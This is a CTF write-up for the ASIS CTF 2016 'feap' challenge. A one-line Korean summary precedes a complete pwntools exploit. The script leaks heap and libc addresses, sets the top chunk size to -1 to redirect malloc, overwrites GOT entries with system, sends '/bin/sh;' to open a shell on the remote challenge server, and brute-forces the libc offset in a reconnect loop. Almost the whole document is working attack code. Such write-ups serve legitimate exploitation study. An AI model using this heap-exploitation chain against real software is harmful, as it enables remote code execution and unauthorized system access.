

ASIS CTF 2016 feap

힙 영역에 64바이트 오버플로우가 있다. top chunk를 덮어 malloc을 조작한 뒤, GOT를 덮어서 쉘을 획득한다.


from pwn import *

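context.arch = 'amd64' # i386 / arm

# Challenge endpoint as given in the original write-up; the local binary
# variant is kept as a comment in the loop below, as the author left it.
HOST = 'feap.asis-ctf.ir'
PORT = 7331

# Distance between fgets and system in libc. 0x27be0 is the author's local
# value; the remote libc is unknown, so the loop below walks this offset
# upward in 0x10 steps and retries the whole interaction on each candidate.
DELTA = 0x27be0


def send_after(r, marker, data):
    """Echo the program's output up to *marker*, then send *data* as one line.

    Every prompt/response pair in the original script was written as a
    ``print r.recvuntil(...)`` followed by ``r.sendline(...)``; this helper
    keeps that echo behaviour in one place.
    """
    print(r.recvuntil(marker))
    r.sendline(data)


def read_title_pointer(r):
    """Select menu item 5, print entry 44, and decode its Title field.

    Returns the Title bytes interpreted as a little-endian integer. The
    reverse-then-hex decode works for a leak of any length, which is why
    it is used instead of a fixed-width unpack.
    """
    send_after(r, '> ', '5')
    send_after(r, 'print: ', '44')
    chunk = r.recvuntil('\nBody:')
    leak = chunk.split('Title: ')[1].split('\nBody:')[0]
    return int(leak[::-1].encode('hex'), 16)


def attempt(r, fgets_to_system):
    """Run one full attempt over the open connection *r*.

    *fgets_to_system* is the candidate libc offset for this iteration.
    Any connection error (EOF, timeout) propagates to the caller, which
    treats it as a wrong guess and moves on to the next candidate.
    """
    # prepare first heap chunk
    send_after(r, '> ', '1')
    send_after(r, 'size: ', '70')
    send_after(r, '63): ', pack(0x6020a8))  # heap address
    send_after(r, '70): ', 'nah')

    # page-align the leaked pointer to get the heap base
    heap_base = read_title_pointer(r) & 0xFFFFF000
    print('heap base : {0}'.format(hex(heap_base)))

    # re-point the title at 0x602048 and read it back to leak fgets
    send_after(r, '> ', '3')
    send_after(r, 'edit: ', '0')
    send_after(r, 'body: ', '1')  # heap address
    send_after(r, 'title: ', pack(0x602048))
    fgets = read_title_pointer(r)
    print('fgets : {0}'.format(hex(fgets)))

    # overwrite topchunk
    send_after(r, '> ', '3')
    send_after(r, 'edit: ', '0')
    send_after(r, 'body: ', '2')
    send_after(r, 'body: ', '\x41' * 72 + '\xFF' * 8)  # overwrite topchunk size to -1

    # request a size chosen so the following allocation lands at TARGET
    TARGET = 0x602010
    size = TARGET - heap_base - 0x218
    print(str(size))
    send_after(r, '> ', '1')
    send_after(r, 'size: ', str(size))
    send_after(r, '63): ', 'lol')

    # overwrite free (author's label); slot comments are the author's
    send_after(r, '> ', '1')
    send_after(r, 'size: ', '70')
    print(r.recvuntil('63): '))
    system = fgets - fgets_to_system
    payload = 'AAAAAAAA'       # libc_start
    payload += pack(fgets)     # fgets
    payload += pack(system)    # strtoll
    r.sendline(payload)        # heap address
    send_after(r, '70): ', 'CCC')

    # get shell
    send_after(r, '> ', '1')
    send_after(r, 'size: ', '/bin/sh;')
    r.interactive()


while True:
    print(hex(DELTA))
    r = None
    try:
        # recvuntil sendline, pack, recv, send
        r = remote(HOST, PORT)
        #r = process(['./feap'])
        #raw_input('attach')
        attempt(r, DELTA)
    except Exception as exc:
        # A wrong DELTA usually shows up as EOF/timeout from the server;
        # narrowed from a bare ``except`` so KeyboardInterrupt still stops
        # the loop instead of being swallowed.
        print('attempt failed: {0!r}'.format(exc))
    finally:
        # The original never closed failed connections, leaking one socket
        # per iteration of the brute force.
        if r is not None:
            r.close()
    DELTA += 0x10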


